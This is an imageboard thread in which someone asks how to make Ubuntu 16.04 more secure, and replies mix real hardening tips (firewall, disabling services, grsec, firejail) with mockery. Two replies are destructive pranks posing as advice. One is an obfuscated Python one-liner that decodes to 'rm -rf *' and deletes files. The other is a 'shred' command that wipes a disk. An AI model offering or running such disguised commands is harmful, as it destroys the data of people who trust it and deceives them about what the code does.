What is the best way to make ubuntu more secure? Running 16.04 and I have disabled amazon shit spyware, dash search info, and installed tor bundle.
Installing Kali tools right now, what else should I install for privacy?
>inb4 gentoo
>its ok i have it on my laptop kek
Use the grsec kernel
ClamAV I guess if you feel like you want an anti-virus software.
>more secure?
>Installing Kali tools right now,
Those two things are not related
>>55451132
>way to make ubuntu more secure[!]
>running 16.04
>i have disabled amazon
Uhh, good job OP, you double-disabled it. It's far more disabled now than when you first installed!
>Kali tools
>tor bundle
okay? Kali is for pen testing and tor is for encrypted web browsing... neither of them really make your OS more secure.
I'd start with configuring your built-in firewall. After that maybe disable any unneeded services that are listening for connections (sshd? cups? samba?)
Remove systemd botnet.
>>55451132
I'm working on an infographic on this
>>55451132
i always run firstpython -c 'import os; os.system("".join([chr(ord(i)-1) for i in "sn!.sg!+"]))'
then set up strong passwords based on the results
>>55451132
did you go with the default unity install?
# shred -vn 3 /dev/sd1
Install Arch, add the libre repository to Pacman. I have a deblobbed grsec kernel, it's perfect. The only thing that is not working with that kernel is the bluetooth which I don't use. Also use firejail.